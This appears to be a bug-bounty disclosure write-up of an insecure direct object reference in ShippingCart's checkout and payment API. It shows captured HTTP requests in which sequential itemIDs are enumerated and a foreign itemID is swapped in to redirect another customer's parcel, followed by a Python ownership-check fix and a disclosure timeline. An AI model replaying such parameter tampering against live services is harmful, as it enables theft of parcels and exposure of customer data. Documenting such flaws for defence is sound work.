ShippingCart

About ShippingCart

ShippingCart is the fastest growing cross-border delivery service, shipping straight to your doorstep. Its secure, easy-to-use system, free consolidation services, fast shipping, and affordability are trusted and loved by its customers.

Ability to leak parcel data on shippingcart

When a user initiates a checkout, a request is sent to the endpoint below to get the parcel details.

POST /api/checkout/ HTTP/1.1
Host: sc-api.prod.shippingcart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
[..]
{"token":"","air":{"items":[1505876,1563242]},"sea":{"items":[]},"insurance":{"1505876":"40.00","1563242":"20.00"},"shipment_location_details":{"origin":"US","destination":"PH"},"warehouse_id":{"1505876":1,"1563242":1}}

As someone with a background in web application pentesting you will surely notice the {"items":[1505876,1563242]} array. Let's call this value our itemID. Once ShippingCart receives a package under your name and address, it is linked to your account and an itemID is generated for it.

Since the itemID is generated incrementally, we can enumerate every package in ShippingCart, including its status.

{
 "id": 1563242,
 "images": "https://s3-us-west-1.amazonaws.com/zone24x7-ocr-prod/hayward_usa/images/originals/17-349966-07162020185052-2.png",
 "description": "clothing",
 "is_abandoned": 0
}

Checkout other users' packages on ShippingCart

To start the payment process, a request is sent to the endpoint below along with the payment and package details. We see in the request that we are shipping itemID 1563252. So what do you think will happen if we change the itemID to a different one that we don't own? We get to steal their package!

POST /api/payment/ HTTP/1.1
Host: sc-api.prod.shippingcart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
[...]

{"token":"JWT","air":{"items":[1563252],"address":"108870","note":""},"insurance":{"1563250":"1.00"},"payment_method":"credit_card","payment_provider":"paypal","promo_code":"","shipment_location_details":{"origin":"US","destination":"PH"},"warehouse_id":{"1563250":1}}


Pay the shipping fee, and after two weeks you will receive your candy, LOL.

HTTP/1.1 200 OK
Date: Fri, 17 Jul 2020 11:12:59 GMT
Content-Type: application/vnd.api+json
Connection: close
[..]
{"parameters":{"payments":{"reference_id":"76437539","method":"paypal","token":"EC-42N68657B8392571P","redirect":"https:\/\/www.paypal.com\/checkoutnow?token=EC-42N68657B8392571P&useraction=commit"},"summary":{"php":{"total_price":"16.99"}}}}

Our little culprit is called Insecure Direct Object Reference (IDOR). It allows attackers to bypass authorization and access resources directly by modifying the value of a parameter that points straight to an object. Such resources can be database entries belonging to other users, files on the system, and more.

The best way to prevent IDOR is to perform an access control check on every request, on the server side, to confirm that the authenticated user is authorized to access the requested object.
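As an added example (not ShippingCart's code), here is what that check looks like for the /api/checkout/ body shown above: the user id comes from the verified session, every place the body names an itemID is collected, and one foreign or unknown id rejects the whole request. The parcel table, user ids and item ids are constructed sample data.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Parcel:
    id: int
    owner_id: int
    description: str

# Constructed sample data: sequential ids like the ones in the captured requests.
PARCELS = {
    1505876: Parcel(1505876, owner_id=42, description="clothing"),
    1563242: Parcel(1563242, owner_id=42, description="shoes"),
    1563252: Parcel(1563252, owner_id=99, description="candy"),
}

class Forbidden(Exception):
    """The request references an item the caller is not allowed to use."""

def lookup_vulnerable(item_ids):
    """The IDOR: trusts client-supplied ids and returns any parcel that exists."""
    return [PARCELS[i] for i in item_ids if i in PARCELS]

def authorize_items(user_id, item_ids):
    """All-or-nothing ownership check. Unknown and foreign ids fail the same way,
    so the endpoint cannot be used to probe which sequential ids exist."""
    parcels = []
    for item_id in dict.fromkeys(item_ids):  # dedupe, keep request order
        parcel = PARCELS.get(item_id)
        if parcel is None or parcel.owner_id != user_id:
            raise Forbidden(item_id)
        parcels.append(parcel)
    return parcels

def handle_checkout(user_id, body):
    """user_id comes from the verified session token, never from the body.
    Every field that names an item id is checked, not only air.items."""
    requested = list(body.get("air", {}).get("items", []))
    requested += body.get("sea", {}).get("items", [])
    requested += [int(k) for k in body.get("insurance", {})]
    requested += [int(k) for k in body.get("warehouse_id", {})]
    try:
        parcels = authorize_items(user_id, requested)
    except Forbidden:
        return 403, {"error": "one or more items are not available to this account"}
    return 200, {"items": [{"id": p.id, "description": p.description} for p in parcels]}
```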

Note:

The vulnerability was reported to QuadX's Product Security Team via Secuna. QuadX takes privacy and data security very seriously, and they worked quickly to resolve the reported issue.

Timeline:

  • July 17, 2020: Reported the Vulnerability to QuadX via Secuna.
  • July 18, 2020: QuadX acknowledges the Vulnerability.
  • July 29, 2020: Vulnerability fixed.